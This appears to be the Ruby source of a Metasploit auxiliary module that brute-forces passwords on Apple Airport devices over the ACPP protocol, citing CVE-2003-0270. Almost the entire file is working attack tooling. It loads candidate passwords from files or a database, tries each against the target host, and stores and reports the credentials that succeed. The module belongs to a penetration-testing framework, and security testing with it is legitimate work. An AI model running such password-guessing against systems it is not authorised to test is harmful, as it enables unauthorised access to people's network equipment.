1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/acpp'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::Tcp
11
  include Msf::Auxiliary::Scanner
12
  include Msf::Auxiliary::Report
13
  include Msf::Auxiliary::AuthBrute
14

15
  def initialize
16
    super(
17
      'Name' => 'Apple Airport ACPP Authentication Scanner',
18
      'Description' => %q{
19
        This module attempts to authenticate to an Apple Airport using its
20
        proprietary and largely undocumented protocol known only as ACPP.
21
      },
22
      'Author' => [
23
        'Jon Hart <jon_hart[at]rapid7.com>'
24
      ],
25
      'References' => [
26
        %w[CVE 2003-0270] # Fixed XOR key used to encrypt password
27
      ],
28
      'License' => MSF_LICENSE,
29
      'Notes' => {
30
        'Stability' => [CRASH_SAFE],
31
        'SideEffects' => [IOC_IN_LOGS],
32
        'Reliability' => []
33
      }
34
    )
35

36
    register_options(
37
      [
38
        Opt::RPORT(Rex::Proto::ACPP::DEFAULT_PORT)
39
      ]
40
    )
41

42
    deregister_options(
43
      # there is no username, so remove all of these options
44
      'DB_ALL_USERS',
45
      'DB_ALL_CREDS',
46
      'DB_SKIP_EXISTING',
47
      'USERNAME',
48
      'USERPASS_FILE',
49
      'USER_FILE',
50
      'USER_AS_PASS'
51
    )
52

53
    register_autofilter_ports([Rex::Proto::ACPP::DEFAULT_PORT])
54
  end
55

56
  def run_host(ip)
57
    vprint_status("#{ip}:#{rport} - Starting ACPP login sweep")
58

59
    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(
60
      blank_passwords: datastore['BLANK_PASSWORDS'],
61
      pass_file: datastore['PASS_FILE'],
62
      password: datastore['PASSWORD']
63
    )
64
    cred_collection = prepend_db_passwords(cred_collection)
65

66
    scanner = Metasploit::Framework::LoginScanner::ACPP.new(
67
      configure_login_scanner(
68
        host: ip,
69
        port: rport,
70
        proxies: datastore['PROXIES'],
71
        cred_details: cred_collection,
72
        stop_on_success: datastore['STOP_ON_SUCCESS'],
73
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
74
        connection_timeout: datastore['ConnectTimeout'],
75
        max_send_size: datastore['TCP::max_send_size'],
76
        send_delay: datastore['TCP::send_delay'],
77
        framework: framework,
78
        framework_module: self,
79
        ssl: datastore['SSL'],
80
        ssl_version: datastore['SSLVersion'],
81
        ssl_verify_mode: datastore['SSLVerifyMode'],
82
        ssl_cipher: datastore['SSLCipher'],
83
        local_port: datastore['CPORT'],
84
        local_host: datastore['CHOST']
85
      )
86
    )
87

88
    scanner.scan! do |result|
89
      credential_data = result.to_h
90
      credential_data.merge!(
91
        module_fullname: fullname,
92
        workspace_id: myworkspace_id
93
      )
94
      password = result.credential.private
95
      if result.success?
96
        credential_core = create_credential(credential_data)
97
        credential_data[:core] = credential_core
98
        create_credential_login(credential_data)
99
        print_good("#{ip}:#{rport} - ACPP Login Successful: #{password}")
100
        report_vuln(
101
          host: ip,
102
          port: rport,
103
          proto: 'tcp',
104
          name: 'Fixed XOR key used to encrypt passwords',
105
          info: "Successful authentication with '#{password}'",
106
          refs: references
107
        )
108
      else
109
        invalidate_login(credential_data)
110
        vprint_error("#{ip}:#{rport} - ACPP LOGIN FAILED: #{password} (#{result.status}: #{result.proof})")
111
      end
112
    end
113
  end
114
end
115

116